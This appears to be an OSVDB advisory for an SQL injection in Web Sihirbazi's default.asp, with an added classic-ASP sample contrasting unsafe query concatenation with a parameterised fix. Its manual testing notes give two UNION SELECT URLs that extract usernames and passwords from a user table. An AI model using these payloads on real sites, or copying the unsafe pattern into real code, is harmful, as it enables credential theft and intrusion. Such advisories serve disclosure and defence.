Web Sihirbazi default.asp Multiple Variable SQL Injection

2007-12-24T00:00:00
ID OSVDB:39640
Type osvdb
Reporter OSVDB
Modified 2007-12-24T00:00:00

Description

Vulnerability Description

Web Sihirbazi contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'default.asp' script not properly sanitizing user-supplied input to the 'pageid' and 'id' variables. This may allow an attacker to inject or manipulate SQL queries in the backend database.
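As an added illustration, not the vendor's code (the record does not show it): a constructed classic-ASP fragment with the string-concatenation pattern the description implies for the 'id' parameter, next to a rewrite that validates the type and binds the value as an ADO parameter. The table and column names, the connection string and the handler names are assumptions.

```vbscript
<%
' Constructed example of the flaw class in the advisory, not the product's code.
' Table "news", columns id/title/body and Application("ConnString") are assumed.
Option Explicit

Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnString")   ' assumed connection string

' --- Flawed pattern: the query-string value is pasted straight into SQL ---
' Anything other than a plain integer changes the statement itself.
Function LoadNewsUnsafe(rawId)
    Set LoadNewsUnsafe = conn.Execute("SELECT id, title, body FROM news WHERE id=" & rawId)
End Function

' --- Hardened pattern: reject non-integers, then bind as a typed parameter ---
Function LoadNewsSafe(rawId)
    Dim cmd
    If Not IsNumeric(rawId) Or InStr(rawId, ".") > 0 Or InStr(rawId, "e") > 0 Then
        Response.Status = "400 Bad Request"
        Response.End
    End If
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "SELECT id, title, body FROM news WHERE id = ?"
    cmd.CommandType = 1                       ' adCmdText
    ' CreateParameter(Name, Type, Direction, Size, Value): 3 = adInteger, 1 = adParamInput
    cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , CLng(rawId))
    Set LoadNewsSafe = cmd.Execute
End Function

Dim rs
Set rs = LoadNewsSafe(Request.QueryString("id"))
Do Until rs.EOF
    Response.Write Server.HTMLEncode(rs("title")) & "<br>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```

The same treatment applies to 'pageid', which the description names as the second affected variable.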

Manual Testing Notes

http://[target]/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user

http://[target]/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user

References:

Vendor URL: http://www.sitehazirla.org/sitehazirla.asp?orta=online

Secunia Advisory ID: 28206

ISS X-Force ID: 39216

Generic Exploit URL: http://www.milw0rm.com/exploits/4777

CVE-2007-6556